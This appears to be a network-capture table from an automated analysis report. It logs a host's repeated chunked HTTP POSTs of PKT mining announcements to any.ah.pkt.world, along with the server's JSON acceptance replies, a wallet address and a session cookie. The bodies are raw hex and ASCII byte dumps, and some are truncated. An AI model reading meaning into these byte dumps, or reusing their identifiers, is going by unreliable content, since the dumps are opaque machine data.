Jan 7, 2025 13:59:15.225089073 CET	11124	OUT	Data Raw: 34 30 30 0d 0a 01 28 17 00 4f 7c 8c e1 b4 43 17 1f 68 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 400(O\|ChJ+^hEXe\k'`2)jAw]s/k1#b(DuuVjpg'.a`T!LwT48+M-509v$B:uy\|a)TDuO
Jan 7, 2025 13:59:15.229877949 CET	1236	OUT	Data Raw: 7b 96 7e d9 32 72 d7 72 c0 46 42 cd 50 c9 ba 56 dc f5 bd 1a 8b 58 aa 21 41 f9 7e 58 2e d7 a3 b4 13 15 31 1f d3 a0 d2 d8 5f ac 4e 0b 04 80 66 82 91 46 e5 95 ea a4 72 1c 8e b7 cd 91 6d 4c 3b 83 43 3f 11 58 74 18 22 49 7c 53 3d ee 3d 58 91 4b 8b 21 Data Ascii: {~2rrFBPVX!A~X.1_NfFrmL;C?Xt"I\|S==XK!B!'"HqriYs<\|R0?Gi=9#Dc;fNsyf+nHt>$?5K(t64z104004M\|ChJ+
Jan 7, 2025 13:59:15.229983091 CET	4944	OUT	Data Raw: 2f 5d 43 d0 f4 46 54 e1 aa 0e 0d 0a 34 30 30 0d 0a 01 64 0f 00 4c 7c 8c e1 b4 43 17 1f 68 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: /]CFT400dL\|ChJ+hELX}A}L2<bSw_op=WTW9}bJQkB-/bY\9Hyxx[?tz
Jan 7, 2025 13:59:15.230058908 CET	2472	OUT	Data Raw: 7e 82 b8 60 22 53 74 f6 5a 92 9b a9 c7 61 ca 69 38 31 90 39 52 bc 5b c5 ef ca 1f 06 02 94 fe c9 17 39 97 e6 39 7c 05 cd 89 97 b0 05 1d 34 38 0f 24 68 43 91 34 05 d4 a9 5e 2b 02 68 5e 87 02 c5 11 71 8b 24 ca fd da 18 b6 fd 21 9e 7f e3 c1 89 31 87 Data Ascii: ~`"StZai819R[99\|48$hC4^+h^q$!1qXSGB'qZ1!E;M/&tKbx8),Uf\|jHrDQC"EMgfO+V61'EX$=JF&EqX m400O\|ChJ+
Jan 7, 2025 13:59:15.230074883 CET	2472	OUT	Data Raw: 42 66 6e c3 2a b3 62 d3 3d b2 52 da 9e 25 4e 11 00 8d 2a 1e 48 5a d4 d7 ab 3f 09 33 ed c4 e8 aa 02 c7 f6 a2 0a 83 27 db db a9 18 0b bb 21 79 0a a3 1f bc 63 44 79 c7 8d 34 1e a0 bc 14 bd 25 33 9a 8c 5a ba 53 40 be 07 1d 4c 96 61 b7 1b ab f0 d7 fe Data Ascii: Bfnb=R%NHZ?3'!ycDy4%3ZS@La&r7}z/2Y[d*Q1Kp>iw/QD4-r]\|yNzX1.@,uU3lHk\g6C&a;S@h_TV
Jan 7, 2025 13:59:15.230154037 CET	4944	OUT	Data Raw: 57 58 02 c1 63 31 c1 8d ae 8d 8c cd 8f 81 02 e6 07 79 3c a6 54 ed 26 d7 d3 2c 09 d2 81 b8 6a 1f 4a 8a 2f 85 68 09 01 41 e2 0a bd e7 94 11 e2 5b 73 d0 72 94 d9 36 f7 f9 de 7b 37 4a 38 99 07 9c 76 77 c0 d2 4b 5c 67 c0 63 ab 01 1b 55 e1 a0 7e d6 c6 Data Ascii: WXc1y<T&,jJ/hA[sr6{7J8vwK\gcU~"1J;Zla?lU #0}~<J6],q{j-B)d^*~v$od<z4 EK;$2q:-N:(zBFG@/c/Jr+l4(^
Jan 7, 2025 13:59:15.230258942 CET	7416	OUT	Data Raw: c0 9b 21 58 88 16 64 6f b8 b1 ab f6 c4 f6 61 b5 cc 36 3b 59 32 35 0b 9e 2a 76 46 56 a1 e1 f7 f1 8c a7 15 9d 17 36 fc db 39 dd f6 1f 45 ce 35 8e 11 0c c1 d7 9a 29 65 7a bb 05 ca 09 51 32 b9 ea 41 d3 28 90 91 e0 68 b8 91 45 c5 42 75 4d b9 8b 89 93 Data Ascii: !Xdoa6;Y25vFV69E5)ezQ2A(hEBuM\|-HJ`UIiA_KClN^"(t>JO(-%5YU5eRo;;$duS.><EJdX`D.3&*
Jan 7, 2025 13:59:15.234863997 CET	2472	OUT	Data Raw: 1e 10 3e d0 b9 66 a7 79 0a 9f be ec ba 35 58 93 8a 31 33 12 6f 14 93 42 78 9a 60 62 6a e1 fb 78 74 06 d7 26 e9 5d f4 63 a3 1d c3 60 86 46 92 46 70 9b 3e 61 cf 54 6f 89 88 4b bb 94 b2 36 bf 3c 67 63 82 b6 37 00 91 b1 99 a9 c7 db 0b 0c 27 61 ee 5f Data Ascii: >fy5X13oBx`bjxt&]c`FFp>aToK6<gc7'a_+E.!*WB-efsLAaIw3.h+o"\|wn-}yE514RtW-X\|:%<T,'@:05]J?^cgI@$_=sfsE-f\
Jan 7, 2025 13:59:15.234882116 CET	2472	OUT	Data Raw: b1 60 dc c6 b3 c9 33 91 69 f4 29 72 33 41 83 c5 69 8f 42 88 59 ec d9 ad c9 3b b2 2f 05 f1 80 a9 a0 26 0d 0a 34 30 30 0d 0a 01 9d 19 00 4e 7c 8c e1 b4 43 17 1f 68 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: `3i)r3AiBY;/&400N\|ChJ+(t/\|(nc/5zmkUYMBc0Z(KU<I7s?# pjijB!}#F;0>!Lm
Jan 7, 2025 13:59:15.235002995 CET	2472	OUT	Data Raw: d7 58 ff 2f 9f 9d 7c 4a 94 cb 70 b3 b5 02 d2 f6 e0 a3 3c f7 59 17 0c 86 22 da 6a 9f c6 ac bb c2 54 79 eb a7 fc ea 10 d4 e8 e9 28 d8 a3 61 fd b5 eb 28 e4 9a 47 91 25 a4 e8 4f 0d 32 09 39 af be 33 81 3b 14 87 33 fc b0 db 5e 51 e4 dc 3a 07 cd 4d d4 Data Ascii: X/\|Jp<Y"jTy(a(G%O293;3^Q:MX(9q2=K`)HA\|riO!Tsb'(LK*_#-o=2nC]b1}{=DYkF\{j.GE[k
Jan 7, 2025 13:59:16.267261982 CET	460	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 12:59:16 GMT Content-Type: application/json Content-Length: 296 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 35 32 30 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 35 32 30 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 35 34 37 35 36 31 37 32 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 37 30 39 36 2d 46 46 45 41 37 31 34 33 44 42 37 41 41 33 41 42 35 35 43 45 33 34 39 46 45 45 33 32 30 36 34 35 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":520,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":520,"totalLen":0,"target":521618356,"time":1736254756172,"eventId":"cah-2837096-FFEA7143DB7AA3AB55CE349FEE320645"}}

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:59:25.813487053 CET	277	OUT	POST /anns/submit?cookie=4a3701444348c2607de40463d7dc7d0a8e9940959292aab39a317c42591d2da0 HTTP/1.1 x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a x-pc-sver: 1 x-pc-annver: 1 x-pc-worknum: 2837097 accept: / host: any.ah.pkt.world transfer-encoding: chunked
Jan 7, 2025 13:59:25.813630104 CET	11124	OUT	Data Raw: 34 30 30 0d 0a 01 0e 43 05 4e 7c 8c e1 b4 43 17 1f 68 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 400CN\|ChJ+u3!qc%R7^G~tss=`N17gQTp[(>lg>R'`s4w$8<SZSnw}!Sj(2NB$J{KJw;eyB.laCu'%8u
Jan 7, 2025 13:59:25.818470955 CET	1236	OUT	Data Raw: 12 14 b4 2e 09 82 5d 39 60 40 3f 9f 07 c9 ae 62 a8 27 31 f5 8f 0e 53 7a 1d d6 8d 64 45 3e 4e c2 2b 51 87 0c 66 56 bc f2 33 2f 08 1d c4 85 41 c1 2f e2 40 a1 fd e1 80 1d 42 ba 27 c3 f8 a3 82 2c 99 a4 db 36 f0 e2 c9 c6 d9 94 7d b3 6b 7f 42 93 cb 6f Data Ascii: .]9`@?b'1SzdE>N+QfV3/A/@B',6}kBoEY`I"IKvM/&tKbx8),Uf\|jHrDQC"EMgfO+NT8#ns<%?uu\+6"400'O\|ChJ+
Jan 7, 2025 13:59:25.818531990 CET	4944	OUT	Data Raw: 9a d9 be 89 e3 35 78 75 c8 24 0d 0a 34 30 30 0d 0a 01 11 37 06 4f 7c 8c e1 b4 43 17 1f 68 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 5xu$4007O\|ChJ+913kLE;H?VQP3BS\|<io;x==b>4N"z&[)PY_T57c*S"gIQ
Jan 7, 2025 13:59:25.818552971 CET	2472	OUT	Data Raw: f2 1e ea 49 e1 39 06 82 25 d4 61 37 b6 04 ed 9d 12 96 f1 29 71 a3 a9 dc 54 78 0f 94 ea d0 18 53 f8 d0 ec af 80 4d 9e b6 78 46 7f 1a b7 8d 44 2c b1 de 22 ad 74 b9 49 e7 31 47 b8 b0 e2 0d 6d 25 86 ed 62 bc 60 fa dd c3 3c 8e 3c 15 a8 21 3c 9c f3 03 Data Ascii: I9%a7)qTxSMxFD,"tI1Gm%b`<<!<F0Rd $EBK[o=9p;3[xY{V:+qn~)!1*A=e6p2Ose"M"NH8Z?Uv:Q)gAe 2Ze~`5/400?O\|ChJ+
Jan 7, 2025 13:59:25.818583965 CET	4944	OUT	Data Raw: 4f f9 0e 0b fd 3a 7a e6 e2 f6 9e b4 09 4b b1 20 f8 3a f1 34 0d 12 37 7a 15 06 c4 46 84 b7 47 ea f9 c9 0b ce 1f e5 60 72 84 3c 27 ac c5 d9 80 44 4a c7 14 91 35 dc 25 4a 7e d4 3f 7a 11 2b f1 ec 99 11 e5 7d 64 f9 e0 00 34 40 bb 60 92 af 8d 22 62 bd Data Ascii: O:zK :47zFG`r<'DJ5%J~?z+}d4@`"b__0>~Y*Kq1Y)uh!m_C_` ,\8KfLEq4:,N@v4HxE\Ufr;]oC,:;?ffdY_i+x4%3CqOyhK+4a
Jan 7, 2025 13:59:25.818722963 CET	4944	OUT	Data Raw: aa 3a 6e 20 b3 49 72 3b e6 d9 73 f3 36 cd a9 f8 ad 64 c0 7a dc 5a 0d 0a 34 30 30 0d 0a 01 39 18 05 4d 7c 8c e1 b4 43 17 1f 68 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: :n Ir;s6dzZ4009M\|ChJ+<90NcgKx8**Rz<sS'\|aEX{8[pIAy#cT7kJD-267 z%+ y`
Jan 7, 2025 13:59:25.818764925 CET	4944	OUT	Data Raw: 45 82 d3 11 ca f6 f7 5f d7 c4 95 ed 92 70 26 e2 db 4d a8 ab 62 6d 1a 18 06 49 0d 7c e3 c2 3d 5f 4a b1 99 3b 47 1a d8 aa 9f 18 44 12 73 d6 9d e2 a3 c4 af e6 b9 9d 1e 69 c8 12 02 51 8d 6d db ab 9e 97 10 50 9c a4 c4 83 18 ac e0 6c ec e1 6b db 80 e2 Data Ascii: E_p&MbmI\|=_J;GDsiQmPlk&#'4mty?;N\h}_f7I^8.>>\|R0?Gi=9#Dc;fNsyf+nHt1)y?NE-NU:XL400C
Jan 7, 2025 13:59:25.823474884 CET	2472	OUT	Data Raw: 3a cc bf db 87 fa 30 0a 46 f8 2b 52 de 90 13 a9 88 2c 79 8b 42 e0 64 a9 6c 2b 72 84 a1 3b 8d 98 ac 56 48 7d bf ec 21 b6 f4 fc eb 35 97 8f 42 2f 3a 8f 85 54 f5 f5 17 eb 5f 8f 28 1b 03 48 17 c2 15 cd 16 23 43 5d 54 a3 64 0d 30 a7 84 bd e1 9f 57 8c Data Ascii: :0F+R,yBdl+r;VH}!5B/:T_(H#C]Td0WBrg9x`J>6d_)}.YqLxLMD):nY20v1GZDQ.U&5.=~%GVB-'~uLg#Ne[=F
Jan 7, 2025 13:59:25.823512077 CET	2472	OUT	Data Raw: 79 41 72 fd 7e 67 54 8c b9 77 0d 67 0b 80 b9 c9 14 be ac 90 13 ad 98 76 d5 1e f2 cd c7 6a b4 f8 7f 04 0d 0a 34 30 30 0d 0a 01 74 74 06 4f 7c 8c e1 b4 43 17 1f 68 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: yAr~gTwgvj400ttO\|ChJ+*\|zp\|]Rsa O{Un{Z),#ogWm-@t7 .j0;\|TPT- 4vW
Jan 7, 2025 13:59:25.823554039 CET	4944	OUT	Data Raw: 18 06 0a 73 0f 89 17 09 dc 6f 58 ea 22 11 69 84 3f 83 11 03 0d 02 8c bc 85 e4 36 d0 bd 74 7b 63 77 33 21 69 7a 81 fa 6c 62 ef 85 a2 bf 7f 2c da f5 5e 6f b6 c4 db 75 dc c0 da 8b a0 9c 5a 8c e9 e4 53 79 98 58 bf a3 e9 40 1f 76 47 c2 0e 9e f1 8f 11 Data Ascii: soX"i?6t{cw3!izlb,^ouZSyX@vG7lAbNY"#8kn;W"Ia<$t20F#0U! 0Hh/_bR9,%\:6c{$lEp@KR3pY(cd
Jan 7, 2025 13:59:26.522042036 CET	460	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 12:59:26 GMT Content-Type: application/json Content-Length: 296 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 34 37 35 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 34 37 35 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 35 34 37 36 36 34 33 31 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 37 30 39 36 2d 41 32 31 35 43 39 33 30 46 43 42 44 32 42 41 41 45 38 43 33 33 42 44 36 43 35 41 31 36 36 39 32 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":475,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":475,"totalLen":0,"target":521618356,"time":1736254766431,"eventId":"cah-2837096-A215C930FCBD2BAAE8C33BD6C5A16692"}}
Jan 7, 2025 13:59:34.910753965 CET	64272	OUT	POST /anns/submit?cookie=4a3701444348c2607de40463d7dc7d0a8e9940959292aab39a317c42591d2da0 HTTP/1.1 x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a x-pc-sver: 1 x-pc-annver: 1 x-pc-worknum: 2837097 accept: / host: any.ah.pkt.world transfer-encoding: chunked Data Raw: 34 30 30 0d 0a 01 84 af 0a 4e 7c 8c e1 b4 43 17 1f 68 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e7 af 8f a7 d5 d0 a8 88 0f f0 37 e8 91 38 6c ea a3 21 3c 5e cb 41 f1 a4 c0 d6 17 33 0d b6 43 c5 fa f9 51 47 c5 0e 3e b6 6b e1 0a ca d6 73 5f 5e b7 4f 2a 27 cb 06 ed 2c 9b 10 1a 77 21 92 73 38 93 15 e5 38 4e 71 99 c2 94 ee 3d b1 26 fa b8 6a aa e3 c1 84 8e 75 b5 7a c6 fb 59 c6 49 3b ac 08 7f c5 ae 93 ba 1c ec b8 60 e8 78 4c e6 c2 84 97 d3 20 10 cf 56 76 ea 4d a7 16 37 1d 3e 8c 85 36 e0 57 7e cc e2 37 e8 be 73 e8 5d ab 75 c7 3a 35 6a a2 d2 cd ec 97 23 21 82 41 77 ee 7b 4b da 92 10 87 db 20 d3 b4 90 9c 35 57 9c fb c5 82 91 22 e8 e0 2f 8a 9c 5d f5 a6 d8 70 98 19 12 e7 d2 32 7f 2a 27 43 ce 51 3b 54 8b 93 d1 15 b0 9c a5 56 cc 3c e3 82 35 58 fa f3 cd 83 7b 37 6d 83 02 bb 56 42 8d 90 9c c5 f7 11 a1 c8 50 22 0b a0 76 4a 56 0a 22 91 cd [TRUNCATED] Data Ascii: 400N\|ChJ+78l!<^A3CQG>ks_^O',w!s88Nq=&juzYI;`xL VvM7>6W~7s]u:5j#!Aw{K 5W"/]p2'CQ;TV<5X{7mVBP"vJV"]ZlBO}e@[PPN(XnOY&B N\1{&GwvqeE'WjNKM#/2M$UxznP'2]-B<Y)o 09E]3%fK{T?,\| 1gG5f2:xzl?P{UH6jG(<_]E8aFMs B(X{wK7GSPd+"]IE5^Z9)BytQ,Nh3C5qHpD_1(>mc03M&.w7=c5??N11E9n@v;uqJ.[[srbe,vg?JbnQWYjp$aINItE:\|%Vy{p]>HvWgYav.n23[xY{V:+qn~)!1A=e6p2Ose"M"NH8Z?Uv:Q)f7nyp\pvT7w_ [TRUNCATED]
Jan 7, 2025 13:59:37.355875015 CET	460	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 12:59:37 GMT Content-Type: application/json Content-Length: 296 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 34 34 33 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 34 34 33 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 35 34 37 37 37 32 36 31 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 37 30 39 36 2d 43 46 35 36 46 34 31 37 36 33 43 42 39 37 38 42 45 31 32 41 35 36 45 45 32 42 38 31 32 32 37 42 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":443,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":443,"totalLen":0,"target":521618356,"time":1736254777261,"eventId":"cah-2837096-CF56F41763CB978BE12A56EE2B81227B"}}
Jan 7, 2025 14:00:05.017090082 CET	64272	OUT	POST /anns/submit?cookie=4a3701444348c2607de40463d7dc7d0a8e9940959292aab39a317c42591d2da0 HTTP/1.1 x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a x-pc-sver: 1 x-pc-annver: 1 x-pc-worknum: 2837098 accept: / host: any.ah.pkt.world transfer-encoding: chunked Data Raw: 34 30 30 0d 0a 01 8b e9 04 4f 7c 8c e1 b4 43 17 1f 69 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 97 21 8d 27 03 f0 bc 50 5a 64 71 c8 bd 6c 29 96 29 b0 9f ad 62 36 b3 4f 5b de c8 da 34 b6 0e fc 09 a7 bb 7f ff 01 f4 87 3c fb dc 90 15 53 ad 03 26 6e 45 28 64 39 a6 92 26 a0 f0 68 fe 2f ff 57 63 1a 32 e8 71 3f f4 79 cc 0c f5 05 3d 81 af 4c fb 27 ca c5 aa 74 50 6e 1e 17 14 69 2a 14 65 d3 5a 2f 30 76 06 a1 c4 e1 51 06 1a ce 48 ab af 26 cc 0a b5 da fa 07 65 4e a5 03 1b 13 96 bd 4e 58 47 8e 21 8a c0 b3 dc 9d 30 60 d6 91 f0 3f 99 32 e3 5a 8f 1b e1 f5 a8 0b 0d 2c 23 5c 2b d8 9f 10 09 e8 3d fd cc 80 7c 96 02 62 eb 40 cf 73 09 f7 18 73 11 1b 0b 3b ea 30 95 23 ba 8a 1b 9e 43 3a db 7f c7 77 65 33 be d5 a5 bf 69 33 b6 e5 19 43 48 c7 4f 8f 5c e1 2c 3c 91 d6 d6 e7 fa 38 8e 29 38 87 81 b3 04 34 b1 63 de 08 46 08 7c 93 e0 c2 24 53 47 83 6e [TRUNCATED] Data Ascii: 400O\|CiJ+!'PZdql))b6O[4<S&nE(d9&h/Wc2q?y=L'tPnieZ/0vQH&eNNXG!0`?2Z,#\+=\|b@ss;0#C:we3i3CHO\,<8)84cF\|$SGn bw)`99aZ{..@rMz~8rXLIYF@uaJsT}Tl6]J/1nnyVk0T'x\|1>uw:FS.;~x/-"$k-g.wJBr(w,rkFeI%M52rx,]<1jj}5p20w=6"94g^N=fQ?R#i'F!)#xDSW] xH9\| @GXvz),o=nE1ooQoamL$1_gmpG~NLJg)Sp*yZ76adPQ;Gc.8\E@#]HQk,d1/@r~nhxMdJV>$;[E@V4FF;e$_H;]andGsAUfk^NR=VJfRmH"sq&KxyAg{n]pt=KN8Q [TRUNCATED]
Jan 7, 2025 14:00:07.334872007 CET	460	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Jan 2025 13:00:07 GMT Content-Type: application/json Content-Length: 296 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 34 39 34 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 34 39 34 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 35 34 38 30 37 32 34 32 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 37 30 39 37 2d 43 44 32 37 34 43 44 37 37 45 38 38 43 31 33 30 43 32 37 30 43 30 36 39 31 31 39 38 37 36 45 34 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":494,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":494,"totalLen":0,"target":521618356,"time":1736254807242,"eventId":"cah-2837097-CD274CD77E88C130C270C069119876E4"}}

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 13:59:45.486746073 CET	277	OUT	POST /anns/submit?cookie=4a3701444348c2607de40463d7dc7d0a8e9940959292aab39a317c42591d2da0 HTTP/1.1 x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a x-pc-sver: 1 x-pc-annver: 1 x-pc-worknum: 2837097 accept: / host: any.ah.pkt.world transfer-encoding: chunked
Jan 7, 2025 13:59:45.486838102 CET	11124	OUT	Data Raw: 34 30 30 0d 0a 01 3e 61 0e 4d 7c 8c e1 b4 43 17 1f 68 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 400>aM\|ChJ+w838eAnf]mTIW:"gnnW@JO>D\|Ie7 drl_P9#CfSQk5l!<m'U454+r&
Jan 7, 2025 13:59:45.491617918 CET	1236	OUT	Data Raw: 20 b3 57 9e 38 47 99 f4 79 5e f6 5c 9d 11 0f 28 d4 af 6b 4d 0e 0e d4 f5 97 93 e3 34 0e bf ec fd 9d 1b 3b 2f 31 92 b8 3d 56 40 e7 e2 15 ea fd 04 f4 2e 99 72 95 10 99 ef fa 9d 34 63 f7 2e 93 ef e9 24 fe 63 32 5b f1 8b 65 08 e5 39 7e 47 cb 1b 87 36 Data Ascii: W8Gy^\(kM4;/1=V@.r4c.$c2[e9~G6RoZw&K}NM/&tKbx8),Uf\|jHrDQC"EMgfO+-Tz(s*!NuSQ{}2fu<400M\|ChJ+
Jan 7, 2025 13:59:45.491699934 CET	4944	OUT	Data Raw: 5a 0b bb e6 71 59 44 a3 f4 5d 0d 0a 34 30 30 0d 0a 01 a1 d3 0e 4c 7c 8c e1 b4 43 17 1f 68 4a 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: ZqYD]400L\|ChJ+8}a]p^6\|%=w4?<_-xm45!5UkQNg_7}'e~s,\|ogDN47?$z<Xmy,N
Jan 7, 2025 13:59:45.491766930 CET	4944	OUT	Data Raw: dc 31 62 ee aa 5c da a8 4c e6 ca e9 be 3a f3 76 cf 33 ef da 8b 37 fd ff 78 dc 4a d4 0a cd 23 33 2e 54 84 f5 f6 45 72 49 3c 06 1f c1 f4 60 5a a0 09 81 07 ab b0 f5 3f 56 6e 92 ca dc ac 11 7a 9f 9e 10 81 cb f6 a5 51 1d 80 6e 67 ed 27 81 b9 ac 46 90 Data Ascii: 1b\L:v37xJ#3.TErI<`Z?VnzQng'F&M.[aTQi5TzM/&tKbx8),Uf\|jHrDQC"EMgfO+V!4&%Kf<1?h$VIc;a400xS\|ChJ+
